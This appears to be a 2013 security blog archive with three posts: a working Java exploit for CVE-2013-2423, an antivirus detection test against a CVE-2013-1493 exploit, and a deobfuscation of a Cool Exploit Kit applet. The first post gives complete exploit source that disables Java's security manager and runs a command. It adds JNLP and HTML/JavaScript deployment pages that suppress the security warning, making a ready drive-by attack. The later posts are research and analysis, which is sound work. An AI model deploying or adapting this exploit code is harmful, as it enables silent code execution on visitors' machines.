</div>Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com3tag:blogger.com,1999:blog-3423828846307461333.post-58964962934709198892013-04-26T14:39:00.000+02:002013-04-27T22:38:49.662+02:00The Latest Java Exploit with Security Prompt/Warning Bypass (CVE-2013-2423) From Java SE 7 update 11 oracle has introduced a new security features called security warning that prompts a window every time an applet request for execution.<br />
<br />
For example, if we want to execute latest Java SE 7 update 17 exploit we get this warning.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-dGzGcf7XW7k/UXk7Q4RYOHI/AAAAAAAAAoQ/57tKgysTFkE/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-dGzGcf7XW7k/UXk7Q4RYOHI/AAAAAAAAAoQ/57tKgysTFkE/s1600/1.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
Yesterday Immunity has published a blog post explaining a new vulnerability they have found into the java validating mechanism which allow to execute an untrusted applet without showing the warning.<br />
<br />
For in-dept details read their blog post <a href="http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html">here</a>.<br />
<br />
Briefly, to bypass the above prompt you must call the applet with the parameter <i>__applet_ssv_validated</i> set to true. The only way to manipulate this parameter is to use a java Network Launch Protocol file.<br />
<br />
Regarding to oracle there are two ways to use JNLP in a page:<br />
<ol>
<li>With the applet tag </li>
<li>With javascript only</li>
</ol>
<div>
Let's try first the example with the tag applet. The code we're going to run is the latest publicly available java exploit <a href="http://weblog.ikvm.net/CommentView.aspx?guid=acd2dd6d-1028-4996-95df-efa42ac237f0">CVE-2013-2423</a>. </div>
<br />
<pre class="brush: java">import java.applet.Applet;
import java.lang.invoke.MethodHandle;
import java.lang.reflect.Field;
import static java.lang.invoke.MethodHandles.lookup;
public class Code extends Applet
{
public void init()
{
try
{
disableSecurityManager();
Runtime.getRuntime().exec("calc.exe");
} catch( Throwable e ){}
}
class Union1 {
int field1;
Object field2;
}
class Union2 {
int field1;
SystemClass field2;
}
class SystemClass {
Object f1,f2,f3,f4,f5,f6,f7,f8,f9,f10,f11,f12,
f13,f14,f15,f16,f17,f18,f19,f20,f21,f22,f23,
f24,f25,f26,f27,f28,f29,f30;
}
private void disableSecurityManager() throws Throwable
{
MethodHandle mh1, mh2;
mh1 = lookup().findStaticSetter(Double.class, "TYPE", Class.class);
mh2 = lookup().findStaticSetter(Integer.class, "TYPE", Class.class);
Field fld1 = Union1.class.getDeclaredField("field1");
Field fld2 = Union2.class.getDeclaredField("field1");
Class classInt = int.class;
Class classDouble = double.class;
mh1.invokeExact(int.class);
mh2.invokeExact((Class)null);
Union1 u1 = new Union1();
u1.field2 = System.class;
Union2 u2 = new Union2();
fld2.set(u2, fld1.get(u1));
mh1.invokeExact(classDouble);
mh2.invokeExact(classInt);
if (u2.field2.f29 == System.getSecurityManager()) {
u2.field2.f29 = null;
} else if (u2.field2.f30 == System.getSecurityManager())
{
u2.field2.f30 = null;
}
}
}
</pre>
<div>
After created the jar in order to deploy an applet we have to create the JNPL and save it as applet.jnlp.</div>
<div>
<pre class="brush: xml"><?xml version="1.0" encoding="utf-8"?>
<jnlp href="applet.jnlp" spec="1.0" xmlns:jfx="http://javafx.com">
<information>
<title>Applet Test JNLP</title>
<vendor>test</vendor>
</information>
<resources>
<j2se href="http://java.sun.com/products/autodl/j2se" version="1.7+" />
<jar href="cve-2013-2423.jar" main="true" />
</resources>
<applet-desc height="1" main-class="Code" name="Applet Security Bypass" width="1">
<param name="__applet_ssv_validated" value="true" />
</applet-desc>
</jnlp>
</pre>
</div>
<div>
Now we have to encode the content of <i>applet.jnlp</i> to a base64 string. To do this you could use an online tool like <a href="http://base64encode.org/">base64encode.org</a> or the unix base64 command: <br />
<br />
<pre class="brush: text">base64 applet.jnlp
</pre>
<br />
As final thing create the page where the applet tag should reside. The value of parameter <i>jnlp_embedded</i> would be the base64 string of <i>applet.jnlp.</i> <br />
<pre class="brush: html"><html>
<body>
<h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3>
<applet>
<param name="jnlp_href" value="applet.jnlp" />
<param name="jnlp_embedded" value="PD94bZX ... zYz4KPPg==" />
</applet>
</body>
</html>
</pre>
</div>
After saving all these files in the same directory we try to load the page with firefox to check if it works. It works perfectly, no security warning prompted. But if you try to see the page with chrome the applet will not be loaded.<br />
<br />
I think because chrome doesn't like jnlp files.<br />
<br />
The second option is to use JavaScript instead of the tag applet. The first step is to create the jnlp file as before, then encode it to base64. Which differs from the previous method is the last step, that will look like this: <br />
<pre class="brush: html"><html>
<head>
<title>CVE-2013-2423 Bypass Prompt</title>
</head>
<body>
<h3>Java SE 7 u17 Exploit with Applet Prompt/Warning Bypass</h3>
<script src="http://www.java.com/js/deployJava.js" ></script>
<script>
var attributes = { height: 1, width: 1};
var parameters = { jnlp_href: 'applet.jnlp',
jnlp_embedded: 'PD94 ... Pg=='
};
deployJava.runApplet(attributes, parameters, '1.7');
</script>
</body>
</html>
</pre>
Loading the page with chrome, firefox, ie and opera shows that it works.<br />
<br />
As usual here is the video. Enjoy.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/LUrGlXdglHM" width="640"></iframe><br />
<br />
Reference: <br />
<ul>
<li><a href="https://www.java.com/en/download/help/appsecuritydialogs.xml">What should I do when I see a security prompt from Java? </a></li>
<li><a href="http://immunityproducts.blogspot.com/2013/04/yet-another-java-security-warning-bypass.html">Yet Another java security warning bypass</a></li>
<li><a href="http://docs.oracle.com/javase/tutorial/deployment/deploymentInDepth/embeddingJNLPFileInWebPage.html">Embedding JNLP File in Applet Tag</a></li>
</ul>
Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com3tag:blogger.com,1999:blog-3423828846307461333.post-91821959827282651342013-03-19T11:56:00.000+01:002013-03-19T11:56:43.904+01:0032 AntiVirus versus the latest Java Exploit (CVE-2013-1493)Image a scenario where someone wants to <b>target</b> your computer to get access to your files. This task can be accomplished in several ways and one of them is using a java exploit on a crafted/compromised website.<br />
<br />
What i want to test is how AntiVirus manage "unknown" threads or forbidden behavior (an unsigned applet shouldn't be allowed to download files to your local disk).<br />
<br />
This test is based on basic/home/free products like Symantec AntiVirus and not Symantec Internet Security which has more features. Some companies provide only Internet Security suites so this <b>cannot</b> be a fully comparison between these products.<br />
<br />
I tried to test all AntiVirus in <a href="https://www.virustotal.com/en/about/credits/">this</a> list but i came out with only 32, because some of them don't provide a free trial and the others i was unable to find it or install it. The important thing is that i covered all major/popular AntiVirus.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-Ax2r90NNt9o/UUQzzlIERhI/AAAAAAAAAnU/iF1MGdnEREo/s1600/opswat.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="296" src="http://4.bp.blogspot.com/-Ax2r90NNt9o/UUQzzlIERhI/AAAAAAAAAnU/iF1MGdnEREo/s640/opswat.jpg" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Testing machine is a Windows 7 SP1 32 bit fully patched on Virtualbox with Java SE 7 update 15 and as browser Firefox.<br />
<br />
The exploit is <a href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493">CVE-2013-1493</a> not obfuscated that after a successfully exploitation tries to download from a remote host to temp directory hello.jpg , after that the is renamed to hello.exe and executed using cmd "cmd /C 'temp_path\hello.exe'".<br />
<br />
The executable just prompt "Hello Malware".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-YvpdUt0TT3E/UUcaUKDwF3I/AAAAAAAAAn0/C3lcQQkPrhE/s1600/hello.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-YvpdUt0TT3E/UUcaUKDwF3I/AAAAAAAAAn0/C3lcQQkPrhE/s1600/hello.jpg" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
I decided to run this executable instead of the classic calculator because some AntiVirus have cloud based reputation service and since this is an unknown file dropped by java (like malware) they should prompt some warning.<br />
<br />
Maybe someone of you will say "this is not a malware, of course av doesn't block it", what i want to test here is the software against the java exploit not about malicious executable detection, because this is another story.<br />
<br />
Developers of chk4me claim to not send uploaded files to AntiVirus companies so this is the right place to check the exploit before the test.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-IWEHwW5-MS8/UUN14eMG4bI/AAAAAAAAAnE/eYNLerGTIYc/s1600/chk4me.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-IWEHwW5-MS8/UUN14eMG4bI/AAAAAAAAAnE/eYNLerGTIYc/s1600/chk4me.jpg" /></a></div>
<br />
<br />
To be more clear i made this table where i report the "score" obtained by the AntiVirus against CVE-2013-1493.<br />
<br />
I used this scale of values:<br />
<ul>
<li>0 = Exploit and "malicious" exe executed successfully</li>
<li>1 = Exploit executed successfully but "malicious" exe not executed or sandboxed</li>
<li>2 = Exploit blocked/not executed</li>
</ul>
<table align="center" border="1"><thead>
<tr><th>AntiVirus Name</th> <th>Score</th></tr>
</thead> <tbody>
<tr><td>Ad-Aware Free Antivirus+</td><td align="center">0</td></tr>
<tr><td>AVG Antivirus Free 2013</td><td align="center">0</td></tr>
<tr><td>Avira Free Antivirus 2013</td><td align="center">0</td></tr>
<tr><td>Bitdefender Antivirus Free Edition</td><td align="center">0</td></tr>
<tr><td>Quick Heal Antivirus Pro 2013</td><td align="center">0</td></tr>
<tr><td>Immunet 3.0</td><td align="center">0</td></tr>
<tr><td>Dr.Web Anti-virus Pro</td><td align="center">0</td></tr>
<tr><td>ESET NOD32 Antivirus 6</td><td align="center">0</td></tr>
<tr><td>FortiClient Endpoint Security Management</td><td align="center">0</td></tr>
<tr><td>F-PROT Antivirus</td><td align="center">0</td></tr>
<tr><td>F-Secure Anti-Virus</td><td align="center">0</td></tr>
<tr><td>G Data AntiVirus 2013</td><td align="center">0</td></tr>
<tr><td>IKARUS anti.virus</td><td align="center">0</td></tr>
<tr><td>Kingsoft Internet Security 9</td><td align="center">0</td></tr>
<tr><td>Malwarebytes Anti-Malware Free</td><td align="center">0</td></tr>
<tr><td>McAfee AntiVirus Plus 2013</td><td align="center">0</td></tr>
<tr><td>Microsoft Security Essentials</td><td align="center">0</td></tr>
<tr><td>NANO Antivirus</td><td align="center">0</td></tr>
<tr><td>Norman Antivirus 10</td><td align="center">0</td></tr>
<tr><td>Outpost Antivirus Pro</td><td align="center">0</td></tr>
<tr><td>Panda Cloud Antivirus</td><td align="center">0</td></tr>
<tr><td>Rising Free Antivirus</td><td align="center">0</td></tr>
<tr><td>VIPRE Antivirus 2013</td><td align="center">0</td></tr>
<tr><td>VirusBuster Personal Antivirus</td><td align="center">0</td></tr>
<tr><td>ArcaVir 2013 Antivirus</td><td align="center">1</td></tr>
<tr><td>Avast! Free Antivirus</td><td align="center">1</td></tr>
<tr><td>Comodo Antivirus Free</td><td align="center">1</td></tr>
<tr><td>Emisoft Anti-Malware 7.0</td><td align="center">1</td></tr>
<tr><td>Trend Micro Titanium Antivirus Plus</td><td align="center">1</td></tr>
<tr><td>Kaspersky Anti-Virus 2013</td><td align="center">2</td></tr>
<tr><td>Norton AntiVirus</td><td align="center">2</td></tr>
<tr><td>Sophos Anti-Virus</td><td align="center">2</td></tr>
</tbody> </table>
<br />
Summarizing the results:<br />
<ul>
<li>24 (75 %) don't detect the exploit neither the executable </li>
<li>5 (16 %) don't detect the exploit but they warn you about the executable</li>
<li>3 (9 %) detect the exploit. </li>
</ul>
Looking only the exploit, 91 % don't detect it and 9 % are able to block it.<br />
<br />
There were some cases where i was undecided between the score 1 or 2, like the case of ArcaVir. When an applet tries to contact another domain ArcaVir prompt you an alert, however its not saying "this is an exploit and i block it" but "hey, this applet is trying to connect to this domain, what you wanna do ?". For this reason i opted for a score of 1 instead of 2.<br />
<div>
<br />
Symantec surprised me because a couple of months ago didn't detect any java exploit and now they block it all, maybe they have decided to improve their basic software after the <a href="http://www.nytimes.com/2013/01/31/technology/chinese-hackers-infiltrate-new-york-times-computers.html">Wall Street Journal</a> story.<br />
<br /></div>
As last thing here is the video, maybe you will find it boring but you can see how several antiviruses handles a java exploit.<br />
<br />
<iframe allowfullscreen="" frameborder="0" height="360" src="http://www.youtube.com/embed/STO5LZBbqXU" width="640"></iframe><br />Security Obscurityhttp://www.blogger.com/profile/06688159457167595136noreply@blogger.com0tag:blogger.com,1999:blog-3423828846307461333.post-42212461848751546482013-02-26T18:39:00.001+01:002013-03-06T10:10:55.854+01:00Deobfuscating Java 7u11 Exploit from Cool Exploit Kit (CVE-2013-0431)At the beginning of the past week <a href="https://twitter.com/kafeine/status/303551981170089984/">@EKWatcher</a> has spotted <a href="http://malware.dontneedcoffee.com/2012/10/newcoolek.html">Cool Exploit Kit</a> using Java 7 update 11 vulnerability (CVE-2013-0431).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-hOI4JyvxnmY/USu0YrJtIMI/AAAAAAAAAgg/XwSVZJCZUHo/s1600/1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-hOI4JyvxnmY/USu0YrJtIMI/AAAAAAAAAgg/XwSVZJCZUHo/s1600/1.jpg" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
This vulnerability was already reported by <a href="http://seclists.org/fulldisclosure/2013/Jan/142">Security Explorations</a> on seclist few days after Oracle issued update 11.<br />
<br />
I decided take a look at it. I found a website infected by Cool EK that after a successfull exploitation dropped Reveton into "<i>C:\Documents and Settings\<usarname>\Application Data</i>" folder on Windows XP.<br />
<br />
The applet used by Cool EK was named would-blood.jar and once opened with JD-GUI the result was this.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-p7gg_GfWZzU/USsq8T_Y9gI/AAAAAAAAAfA/dx7psxiKuhw/s1600/would_blood_applet.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="388" src="http://4.bp.blogspot.com/-p7gg_GfWZzU/USsq8T_Y9gI/AAAAAAAAAfA/dx7psxiKuhw/s640/would_blood_applet.JPG" width="640" /></a></div>
<br />
As you can see it's obfuscated, not heavily but obfuscated. The first thing to do when you want to start deobfuscating an applet is to find the init() function which is the "starting point" and cannot be changed. Remember that for serialized applets the starting point is a function called start() instead of init().<br />
<br />
The init function is inside <b>hw</b> class.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-tq9UjKYDGP4/USsrP_Ki0KI/AAAAAAAAAfI/rNE7bvkm1TI/s1600/applet_init.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="266" src="http://4.bp.blogspot.com/-tq9UjKYDGP4/USsrP_Ki0KI/AAAAAAAAAfI/rNE7bvkm1TI/s640/applet_init.JPG" width="640" /></a></div>
<br />
It's immediately evident that all strings in init() are reversed, for example the first one is <i>txetnoC.lanretni.tpircsavaj.allizom.gro.nus</i> which written backwards will become <i>sun.org.mozilla.javascript.internal.Context</i>. As supposed <b>pah</b> function reverse the string.<br />
<br />
The next function called is <b>bug</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-QwvDEVrYScs/USsrhTj2tZI/AAAAAAAAAfQ/8bgcK0Sp8WQ/s1600/bug_function.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="123" src="http://3.bp.blogspot.com/-QwvDEVrYScs/USsrhTj2tZI/AAAAAAAAAfQ/8bgcK0Sp8WQ/s640/bug_function.JPG" width="640" /></a></div>
<br />
<b>Bug</b> function obtains the MBeanInstantiator associated to MBeanServer and calls <b>rue2</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2qjdw2EdOg8/USsrqrh1frI/AAAAAAAAAfY/uVble5o_8TM/s1600/rue2_function.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-2qjdw2EdOg8/USsrqrh1frI/AAAAAAAAAfY/uVble5o_8TM/s1600/rue2_function.JPG" /></a></div>
<br />
Now through the use of reflection invokes the method findClass which finds and return the specified class (<i>sun.org.mozilla.javascript.internal.Context).</i><br />
<br />
Considering this, we can remove <b>pah</b> function and join <b>bug </b>with <b>rue2</b> in a new one function called <b>GimmeClass</b>.<br />
<pre class="brush: java">private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException
{
Object obj = null;
JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true);
MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator();
Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator");
Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class });
return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj });
}</pre>
Back to init function, at line 76 <b>lot</b> function is executed and since it returns a Method object i suppose that is used to find a method.<br />
<br />
<div class="separator" style="clear: both; text-align: left;">
<a href="http://3.bp.blogspot.com/-keimpdTpQvc/USssYkmscEI/AAAAAAAAAfg/Y35_uxEhhMA/s1600/lot_function_find_method.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-keimpdTpQvc/USssYkmscEI/AAAAAAAAAfg/Y35_uxEhhMA/s1600/lot_function_find_method.JPG" /></a></div>
<br />
As expected its job is to search for a public method in a class, which is equal to the string s passed as parameter. Instead of <b>lot</b> let's call it <b>getMethod </b>that sounds more clear.<br />
<pre class="brush: java">private Method getMethod(Class class1, String s, boolean flag)
{
try {
Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods");
Method[] amethod1 = amethod;
for (int i = 0; i < amethod1.length; i++) {
Method method = amethod1[i];
String s1 = method.getName();
Class[] aclass = method.getParameterTypes();
if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method;
}
} catch (Exception localException) { }
return null;
}</pre>
At line 77 the previous searched method is invoked. Line 78 and 79 do the same thing of previous lines. At line 82 a byte array (abyte0) is instantiated. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-ulTOiFYTH6k/USssp3eDq1I/AAAAAAAAAfs/P7kE38FTeUU/s1600/byte_array_istantiated.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-ulTOiFYTH6k/USssp3eDq1I/AAAAAAAAAfs/P7kE38FTeUU/s1600/byte_array_istantiated.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
This instruction calls two methods, one from <b>getString4Popers </b>class and one from <b>codehex</b>. Let's examine the first one, which is <b>one</b>. After declaring sixteen strings (127 in total) and concatenating each other, it calls another method with the name <b>gouerpyftn</b> from <b>BurkinoGoso</b> class.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-ZGTlj9wVkyA/USss7qiJySI/AAAAAAAAAf0/Rz6fpoJR8OA/s1600/class_string4popers.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-ZGTlj9wVkyA/USss7qiJySI/AAAAAAAAAf0/Rz6fpoJR8OA/s1600/class_string4popers.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
All this concatenated strings goes as parameter to <b>gouerpyftn</b>. As you can see from the picture below the value of string str will be the value of the string str1 inside <b>gouerpyftn</b> function. </div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://2.bp.blogspot.com/-yIcOmHIjMdI/USy31sJaJFI/AAAAAAAAAmk/SlBF2K3cVxk/s1600/getkkkk_function.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-yIcOmHIjMdI/USy31sJaJFI/AAAAAAAAAmk/SlBF2K3cVxk/s1600/getkkkk_function.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
Str3 and str4 are garbage because they will never be used. Instruction 13 use reflection to call the method charAt from package java.lang.String.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
What the function does is: (I will try to explain through pseudocode)<br />
<pre class="brush: text">// encodedString is paramString
encodedStrign = "F-Abr-rb((((((}g((Ar(-(((8((0r(8((}}((0F(^((0z(- ..."
// keyString is str1 (getString.getKkkk())
keyString = "b12gO6%oh3}lfs98^mYauL5{qiy)RKpk40(VXBrtW&DzCFA-JndU_eZwTNHc+7QMx*vIPSGE"
for( i = 0; i < encodedString.length; i++ )
c = encodedString.charAt(i);
j = keyString.indexOf( c )
if c is inside keyString
if c is not in the first position
give me char from keyString at position j-1
concatenate to finalString
else
give me char from keyString at position keyString.length-1
concatenate to finalString
else
give me char from encodedString at position i
concatenate to finalString
endfor;
return finalString</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-R5XgNFKN2A0/USx1u4CP7AI/AAAAAAAAAg8/Z89MHSRfzec/s1600/gouerpyftn_function.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="418" src="http://4.bp.blogspot.com/-R5XgNFKN2A0/USx1u4CP7AI/AAAAAAAAAg8/Z89MHSRfzec/s640/gouerpyftn_function.JPG" width="640" /></a></div>
At the end of this loop str2/finalString will be like this. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-a90SiqCc4oc/USyIp8CJVZI/AAAAAAAAAhY/4ZJ4hXtxGTs/s1600/four_chars.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-a90SiqCc4oc/USyIp8CJVZI/AAAAAAAAAhY/4ZJ4hXtxGTs/s1600/four_chars.JPG" /></a></div>
<br />
Looking at the first eight chars you can clearly understand what kind of string is this, because CAFEBABE is the hexadecimal representation of the header for Java bytecode class files.<br />
<br />
But we have a byte array (abyte0), in fact as name could suggest the method <b>decodeH</b> from class <b>codehex</b> converts hexadecimal string into a byte array. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-pEkRqjy7G_A/USyJXrp221I/AAAAAAAAAhg/GZO06TgccCk/s1600/decodeh_function.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="406" src="http://4.bp.blogspot.com/-pEkRqjy7G_A/USyJXrp221I/AAAAAAAAAhg/GZO06TgccCk/s640/decodeh_function.JPG" width="640" /></a></div>
From line 8 to line 19 is again garbage added by the obfuscator so we can remove it. In order to know what code that class contains we have to write it on a file called newfile.class and then try to open with JD-GUI.<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-y3K7Z2r7xd0/USyKn6cF_VI/AAAAAAAAAhs/lplVnC_DMcg/s1600/jdgui_fail.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-y3K7Z2r7xd0/USyKn6cF_VI/AAAAAAAAAhs/lplVnC_DMcg/s1600/jdgui_fail.JPG" /></a></div>
But JD-GUI failed to decompile the class file. I wasn't expecting this result, anyway let's open it with Winhex.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-kDMiDWsE5XA/USyMPXXD11I/AAAAAAAAAiY/9uxMv7t8a7A/s1600/hex_class_file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-kDMiDWsE5XA/USyMPXXD11I/AAAAAAAAAiY/9uxMv7t8a7A/s1600/hex_class_file.JPG" /></a></div>
This confirm that is a class file. Switching to option text display only you can clearly see what this class is supposed to do. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-1xaAuKEvhBY/USySmt241JI/AAAAAAAAAjA/qtOdnr7uVOU/s1600/strings_class_file.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-1xaAuKEvhBY/USySmt241JI/AAAAAAAAAjA/qtOdnr7uVOU/s1600/strings_class_file.JPG" /></a></div>
<br />
Scrolling down there is an interesting string. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-sZNDhiXrKBk/USyTBWRgy5I/AAAAAAAAAjI/wbGdxPv9ZFc/s1600/zeilik_klassmaster.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-sZNDhiXrKBk/USyTBWRgy5I/AAAAAAAAAjI/wbGdxPv9ZFc/s1600/zeilik_klassmaster.JPG" /></a></div>
<br />
This means that this class file has been obfuscated with Zelik Klassmater 5.4.5 which was available from <a href="http://www.zelix.com/klassmaster/changes.html">March 2011 to June 2011</a>. I don't know if zelik during the obfuscation process fakes his version so i cannot be 100% sure about this. <br />
<br />
Another interesting string is<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-K9YuM804dvc/USyUgNds-II/AAAAAAAAAjo/wvttqnl39rE/s1600/string_serializable.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-K9YuM804dvc/USyUgNds-II/AAAAAAAAAjo/wvttqnl39rE/s1600/string_serializable.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Now how we proceed ?. Let's try jad which is another java decompiler.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-2Uo6GlfhP_Q/USyU0MSKN1I/AAAAAAAAAkE/B3K1Mv2FtXY/s1600/jad_decompiler.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-2Uo6GlfhP_Q/USyU0MSKN1I/AAAAAAAAAkE/B3K1Mv2FtXY/s1600/jad_decompiler.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://4.bp.blogspot.com/-mqaEs-Y1NV8/USyU_Mcy61I/AAAAAAAAAkM/JI94TLCUs5s/s1600/mix_java_jvm.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="439" src="http://4.bp.blogspot.com/-mqaEs-Y1NV8/USyU_Mcy61I/AAAAAAAAAkM/JI94TLCUs5s/s640/mix_java_jvm.JPG" width="640" /></a></div>
<br />
Most of the file has been disassembled successfully but as you can see into the constructor it uses reflection to call a method from a class. Both names are encrypted by a xor function called from a static field during class initialization. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://1.bp.blogspot.com/-OFSCNc4vPxg/USyVYOCYlYI/AAAAAAAAAkU/9-0GTwCQSdE/s1600/mix_java_and_jvm_instructions.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="http://1.bp.blogspot.com/-OFSCNc4vPxg/USyVYOCYlYI/AAAAAAAAAkU/9-0GTwCQSdE/s640/mix_java_and_jvm_instructions.JPG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-v5oam0wXiAc/USyVoG4rIsI/AAAAAAAAAkc/dOg0qXSwanQ/s1600/xor_intruction.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-v5oam0wXiAc/USyVoG4rIsI/AAAAAAAAAkc/dOg0qXSwanQ/s1600/xor_intruction.JPG" /></a></div>
<br />
Not good, some methods aren't properly decompiled. Seems that Zelix has been used with aggressive flow obfuscation, maybe this is why jad can't fully decompile it.<br />
<br />
Searching on google on how to deobfuscate Zelix Klassmaster files i've found this great <a href="http://www.the-playground.dk/index.php?page=zelix-klassmaster-string-encryption">post</a> by <a href="https://twitter.com/robert_c_larsen">@robert_c_larsen</a> which explains how to decrypt these strings. The first thing we need to do is to disassembly our obfuscated file with jad in order to obtain only jvm instructions. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://3.bp.blogspot.com/-I01G0HfRlLU/USyXBlp7TsI/AAAAAAAAAkw/j_Yo7idJx30/s1600/disass_class.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-I01G0HfRlLU/USyXBlp7TsI/AAAAAAAAAkw/j_Yo7idJx30/s1600/disass_class.JPG" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
